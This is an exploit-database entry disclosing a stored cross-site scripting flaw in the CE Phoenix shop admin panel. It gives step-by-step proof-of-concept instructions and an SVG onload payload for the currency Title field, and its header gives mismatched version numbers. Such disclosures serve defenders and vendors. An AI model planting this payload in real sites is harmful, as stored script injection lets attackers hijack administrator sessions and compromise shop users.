Share
## https://sploitus.com/exploit?id=PACKETSTORM:175897
# Exploit Title: CE Phoenix Version 1.0.8.20 - Stored XSS  
# Date: 2023-11-25  
# Exploit Author: tmrswrr  
# Category : Webapps  
# Vendor Homepage: https://phoenixcart.org/  
# Version: v3.0.1  
# Tested on: https://www.softaculous.com/apps/ecommerce/CE_Phoenix  
  
## POC:  
  
1-Login admin panel , go to this url : https://demos6.softaculous.com/CE_Phoenixx3r6jqi4kl/admin/currencies.php  
2-Click edit and write in Title field your payload : <sVg/onLy=1 onLoaD=confirm(1)//  
3-Save it and go to this url : https://demos6.softaculous.com/CE_Phoenixx3r6jqi4kl/admin/currencies.php  
4-You will be see alert button